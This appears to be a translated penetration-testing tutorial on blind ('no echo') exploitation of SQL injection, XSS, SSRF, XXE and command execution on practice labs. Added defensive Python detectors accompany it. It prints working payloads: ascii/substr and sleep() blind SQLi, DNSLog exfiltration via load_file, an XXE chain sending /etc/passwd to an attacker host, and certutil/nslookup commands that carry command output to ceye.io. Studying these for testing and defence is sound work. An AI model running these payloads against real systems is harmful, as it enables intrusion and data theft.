0x01 Preface
During penetration testing, the application will not always output the result of an operation to the page, that is, the vulnerability has no echo. In such cases we can confirm the vulnerability through DNSLog, or with a Python HTTP server, among other ways. The following mainly analyzes some cases.
0x02 The concept of "no echo"
No echo means that the payload produces no output at the injection point, so further operations cannot be carried out directly. During penetration testing the vulnerable point does not always produce output on the returned page, so some non-echo exploitation techniques are needed.
0x03 No echo in different vulnerabilities
1. SQL injection without echo
SQL injection, the perennial top-ranking vulnerability in the OWASP list, also commonly occurs without echo. Of course, SQL injection without echo has its own solutions. No echo is defined here as the page not outputting what we want. The following uses SQLi-Labs as an example.
1.1 Boolean blind injection
Boolean blind injection is a type of blind injection. When a website decides what to output from whether the query statement evaluates to true or false, a true query makes the page output content and a false query makes the page output nothing. So we can construct comparisons, obtain the ASCII code of each character, and finally recover the data. The specific test process is as follows:
1. After passing id=1 the page returns data. Obviously error-based injection cannot be performed here.
2. Add a single quotation mark after the parameter: the page returns empty and shows no error message, so error-based injection cannot be used.
3. Append and 1=1 and and 1=2 in turn and compare the responses.
4. Determine that the length of the database name is greater than 1 using the length() function:
?id=1' and length(database())>1 %23
5. The page returns empty when the length is tested as greater than 8, so the database name is 8 characters long.
6. Get the ASCII code of the first character of the database name with the ascii() function and the substr() string-slicing function:
?id=1' and ascii(substr((select database()),1,1))>97 %23
?id=1' and ascii(substr((select database()),1,1))=101 %23
The ASCII code of the first character of the database name is 115, which corresponds to the character s.
7. Change the slicing position and determine the ASCII code of the following characters:
?id=1' and ascii(substr((select database()),2,1))=101 %23
1.2 Delayed blind injection
Delayed (time-based) blind injection is another blind injection method. When during a penetration test we cannot use error-based injection or Boolean blind injection, because the page returns the same content whether the condition is true or false, we can try delayed blind injection and judge whether a guess is correct by how long the page takes to load. The database's if() function has the syntax if(exp1,exp2,exp3): when exp1 is true it evaluates exp2, otherwise exp3. Combined with the sleep() delay function, we can obtain the ASCII code of each character and finally recover the data. The following example shows delayed blind injection:
1. The page below returns the same content whether the condition is true or false, so Boolean blind injection cannot be used.
2. Use and to splice in the delay function and check whether the page is delayed. First record the response time without the delay function, 4.* seconds. After using sleep(5) to delay for 5 seconds, the response time is 9.* seconds, showing that the sleep() we injected executed and that delayed blind injection is possible here.
3. Determine the length of the database name through delayed injection. The page is delayed only when the tested length equals 8, so the database name is 8 characters long:
?id=2' and if((length(database())=8),sleep(5),1) %23
4. As in Boolean blind injection, slice the subquery result and compare its ASCII code; when equal, the page is delayed by 5 seconds. The first character has ASCII code 115:
?id=2' and if((ascii(substr((select database()),1,1))=115),sleep(5),1) %23
5. Change the slicing position and test the ASCII values of the following characters. The resulting ASCII codes are 115 101 99 117 114 105 116 121, which decode to the database name security.
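Seen from the defending side, both blind techniques above leave a distinctive trail in the web server's access log: many requests per client carrying comparison, length(), ascii(substr(...)) or sleep() expressions, and for Boolean blind injection two alternating response sizes. The following detector is an added example, not code from the original post; the log lines it runs on are constructed in the combined-log format and reuse the probes shown above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request patterns taken from the Boolean and delayed blind probes described above.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "length_probe": re.compile(r"length\s*\(\s*database\s*\(", re.I),
    "char_extraction": re.compile(r"ascii\s*\(\s*substr", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(\s*\d+|\bbenchmark\s*\(", re.I),
}
# Common-log prefix: client, timestamp, request line, status, response bytes.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)[^"]*" '
                      r'(?P<status>\d{3}) (?P<bytes>\d+|-)')

def classify_request(path):
    """Names of the signatures matching a URL-decoded request path."""
    return [name for name, rx in SIGNATURES.items() if rx.search(unquote_plus(path))]

def analyze(log_lines, min_requests=3):
    """Aggregate tagged requests per client. Blind extraction is chatty (one request
    per tested character), so a client is reported after min_requests hits or any
    delay probe; two distinct response sizes from one client show the page acting
    as the true/false oracle that Boolean blind injection relies on."""
    clients = defaultdict(lambda: {"requests": 0, "tags": set(), "sizes": set()})
    for line in log_lines:
        m = LOG_LINE.match(line)
        tags = classify_request(m["path"]) if m else []
        if not tags:
            continue
        c = clients[m["ip"]]
        c["requests"] += 1
        c["tags"].update(tags)
        c["sizes"].add(m["bytes"])
    alerts = {}
    for ip, c in clients.items():
        if c["requests"] >= min_requests or "time_delay" in c["tags"]:
            alerts[ip] = {"requests": c["requests"], "tags": sorted(c["tags"]),
                          "boolean_oracle": len(c["sizes"]) > 1}
    return alerts

# Constructed sample log (not from the original post); the probes are those shown above.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-8/?id=1%27%20and%201%3D1%20%23 HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-8/?id=1%27%20and%201%3D2%20%23 HTTP/1.1" 200 1241
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-8/?id=1%27%20and%20length(database())%3E8%20%23 HTTP/1.1" 200 1241
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%3D115%20%23 HTTP/1.1" 200 1532
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-9/?id=2%27%20and%20if((length(database())%3D8),sleep(5),1)%20%23 HTTP/1.1" 200 1532
"""
```

Running analyze(SAMPLE_LOG.splitlines()) reports 10.0.0.7 with four probes and a true/false oracle, and 10.0.0.9 on a single request because of the sleep() call.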
1.3 Using DNSLog for SQL injection
Blind injection was introduced above. Obtaining data through Boolean or delayed blind injection is very tedious: it retrieves one character at a time and then requires ASCII decoding, which costs a lot of time and effort. To speed up the process and obtain data more easily, here is how to perform SQL injection through DNSLog.
DNSLog
DNSLog, the DNS log, records and displays the requests made to a DNS service. It is often used to test whether a vulnerability exists and to carry data out when it cannot be obtained directly. Simply put, DNSLog is a server that records every access to it, including the requested domain name, the source IP address and the time. We can therefore splice a subquery into a DNSLog subdomain and finally read the required data from the DNS log.
The load_file() function
The database's load_file() function reads a file on the database server: load_file('c:/1.txt') reads the file and returns its contents as a string. Obtaining data with load_file() requires the following conditions: 1. the file is on the server; 2. the file is specified with its full path.
UNC path
A UNC (Universal Naming Convention) path is a way of addressing network resources. It has the format \\servername\sharename and is used in Windows for file sharing, for example \\192.168.1.1\sharename.
DNSLog injection example
1. Open the example site; it is obviously a blind-injection-only site.
2. Determine the number of columns with order by.
3. On the DNSLog website, apply for a DNSLog domain name: pcijrt.dnslog.cn
4. Use load_file() to splice the database-name subquery onto the DNSLog domain name, followed by any non-existent folder name. Finally put this query into a union query; the payload is constructed as follows:
?id=1' union select 1,2,load_file(concat('//',(select database()),'.pcijrt.dnslog.cn/abc')) %23
5. After the statement executes, the database name appears in the DNSLog.
6. Modify the subquery to obtain other data.
2. XSS without echo
XSS without echo is a special case. Normally the criterion for an XSS vulnerability is the pop-up box. But there are cases where, after a form is submitted, the page only shows whether the submission succeeded or failed and never outputs the submitted content. In that case the attack has to be carried out through blind XSS. The following examples use the Pikachu vulnerability practice platform:
2.1 Blind XSS
1. Here is a feature for submitting feedback.
2. Any content can be submitted; the page reports that the submission succeeded but does not return the entered content.
3. After logging in to the admin backend, the data is displayed there.
4. An injected pop-up statement executes successfully in the backend.
5. During a penetration test we cannot log in to the backend to check, so we have to use blind XSS: submit the payload of an XSS platform and wait for the administrator to view the content before the payload fires.
2.2 Detecting the vulnerability through DNSLog
Payload:
<img src=http://xss.t7y3wc.dnslog.cn>
3. SSRF without echo
SSRF is server-side request forgery: an attacker constructs a request that the server then initiates. The test code is as follows:
<?php echo file_get_contents($_GET['url']); ?>
First, the vulnerability can be verified by making the server visit Baidu.
If there is no echo, nothing is output and the page is empty.
In this case the vulnerability can be confirmed with DNSLog or with a Python HTTP service:
1. DNSLog
http://172.16.29.2/ssrf_test.php?url=http://ssrf.02c6ot.dnslog.cn
2. Python HTTP service
python3 -m http.server 4545
4. XXE without echo
Since XML is used to store and transfer data, the application has no reason to output the content unless the business actually needs it. This means the file contents are indeed read but cannot be seen: XXE has no echo. Of course, the queried content can still be placed in front of a domain name and recorded through the DNS log. Although this XXE example does not go through DNSLog, it carries data out in the same way. The process is as follows: from the victim's website we request the file 1.xml on the attacker's VPS; the content of 1.xml places some data into a GET parameter used to access 2.php; 2.php saves the data of the GET parameter into 3.txt. The contents of the files are given below. The IP address in the files should be the attacker's IP address, and all three files are placed on the attacker's VPS.
1.xml
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://attacker-ip/2.php?id=%file;'>">
%all;
2.php
<?php file_put_contents("3.txt", $_GET["id"], FILE_APPEND); ?>
3.txt (the file that receives the data)
Payload:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % remote SYSTEM "http://server-ip/xxe/1.xml">
%remote;
%send;
]>
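From the defending side, the chain above only works because the parser accepts a DTD and resolves parameter entities. The following pre-check is an added example, not code from the original post: it records the DOCTYPE and every entity declaration of an incoming document with Python's expat while parameter entity parsing is switched off, so a payload like the one above can be rejected before it reaches the business parser; the server-ip placeholder is kept from the post.

```python
import xml.parsers.expat as expat

def audit_xml(data):
    """Record the DOCTYPE and every entity declaration of an XML document without
    fetching any external resource; a pre-check to run before the real parser."""
    findings = {"doctype": None, "entities": [], "parse_error": None}
    p = expat.ParserCreate()
    # Never resolve parameter entities: %remote; cannot pull 1.xml into this check.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        # sysid is None for inline entity values and set for SYSTEM identifiers.
        findings["entities"].append({"name": name, "parameter": bool(is_param),
                                     "resource": sysid})

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        findings["parse_error"] = str(e)
    return findings

def external_entities(findings):
    """Entities that point outside the document (SYSTEM ids, including php:// wrappers)."""
    return [e["name"] for e in findings["entities"] if e["resource"] is not None]

def is_safe(findings):
    """Business XML never needs a DTD: reject any document that declares one."""
    return findings["doctype"] is None

# Constructed test input: the payload from the write-up (placeholder kept) with a
# root element appended, and a benign document of the kind an application expects.
OOB_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % remote SYSTEM "http://server-ip/xxe/1.xml">
%remote;
%send;
]>
<root/>"""
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
```

For production parsing, use a library that disables DTDs outright, such as defusedxml; this audit only shows what the payload declares.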
5. Command execution without echo
A simple command-execution site.
Nothing is displayed after any command is entered.
5.1 Confirming the vulnerability with DNSLog
5.2 Carrying data out with DNSLog
5.2.1 Obtaining the Windows user name
http://127.0.0.1/test_blind/exec.php?cmd=ping+%USERNAME%.io5a5i.dnslog.cn
5.2.2 Executing other commands
cmd /c whoami > temp && certutil -encode -f temp temp && FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c nslookup %_:~0,-1%.xxxx.ceye.io) & del temp
cmd /c ipconfig > temp && certutil -encode -f temp temp && FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c nslookup %_:~0,40%.xxxx.ceye.io & cmd /c nslookup %_:~40,-1%.xxxx.ceye.io) & del temp
Passing the parameter via POST:
1. The parameter content needs to be URL-encoded.
2. Send it in a POST request.
3. DNSLog receives the result.
4. Base64-decode it to obtain the content.
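Every out-of-band case on this page (the load_file() subquery, the XSS and SSRF callbacks, the %USERNAME% ping and the certutil-chunked command output) ends up as queries for subdomains of a DNSLog domain, which makes the resolver log the place to detect it and, during incident response, to reconstruct what left the host. The analyzer below is an added example, not code from the original post; it uses a constructed, simplified query-log format (time, client, queried name), the service domains named on this page as its watchlist, and sample names built from the page's payloads with a constructed whoami value.

```python
import base64
import re
from collections import defaultdict
OOB_DOMAINS = ("dnslog.cn", "ceye.io")  # services used in the write-up; extend as needed
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/]{8,63}={0,2}$")
LOG_RX = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")  # constructed: "<time> <client> <qname>"
def split_oob_name(qname):
    """Return (tester's OOB domain, data labels in front of it) or (None, [])."""
    name = qname.rstrip(".")
    low = name.lower()
    for d in OOB_DOMAINS:
        if low == d or low.endswith("." + d):
            labels = name[: -len(d)].rstrip(".").split(".") if low != d else []
            # The label before dnslog.cn/ceye.io is the service's random token; the rest is data.
            return (labels[-1].lower() + "." + d, labels[:-1]) if labels else (d, [])
    return None, []

def decode_chunks(chunks):
    """Join base64 labels in query order (certutil/nslookup pattern) and decode them."""
    joined = "".join(chunks)
    joined += "=" * (-len(joined) % 4)
    try:
        text = base64.b64decode(joined, validate=True).decode("utf-8")
    except ValueError:  # plain words such as 'security' decode to junk and land here
        return None
    return text if text and text.isprintable() else None

def analyze_dns(log_lines):
    """Per (client, OOB domain): query count, labels carried out, decoded payload."""
    sessions = defaultdict(lambda: {"queries": 0, "leaked_labels": []})
    for line in log_lines:
        m = LOG_RX.match(line)
        domain, labels = split_oob_name(m.group(3)) if m else (None, [])
        if domain is None:
            continue
        s = sessions[(m.group(2), domain)]
        s["queries"] += 1
        s["leaked_labels"].extend(labels)  # assumes the log is in time order
    for s in sessions.values():
        s["decoded"] = decode_chunks([l for l in s["leaked_labels"] if BASE64_LABEL.match(l)])
    return dict(sessions)

# Constructed sample (not from the post): SQLi, username and certutil-chunked whoami
# exfiltration from one client, plus a plain SSRF callback from another.
SAMPLE_DNS_LOG = """\
2024-01-01T10:00:01 10.0.0.7 security.pcijrt.dnslog.cn
2024-01-01T10:00:02 10.0.0.7 alice.io5a5i.dnslog.cn
2024-01-01T10:00:03 10.0.0.7 ZGVza3RvcC10.xxxx.ceye.io
2024-01-01T10:00:04 10.0.0.7 ZXN0XGFsaWNl.xxxx.ceye.io
2024-01-01T10:00:05 10.0.0.9 ssrf.02c6ot.dnslog.cn
"""
```

A session with no labels in front of the token is a bare callback (vulnerability confirmation only); one with labels carried data out, and one whose labels decode shows exactly which command output was chunked through DNS.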
Conclusion
No echo is common in penetration testing; a program cannot echo every operation to the page. In these cases we need to carry data out to obtain the content we want. Of course, it is better to get a reverse shell and execute commands through the shell, which is far more convenient.
There are many, many no-echo cases; only a few are briefly introduced here. I hope readers can learn from these cases how to carry out penetration testing without echo. There are many methods and none is fixed; what matters is learning the idea.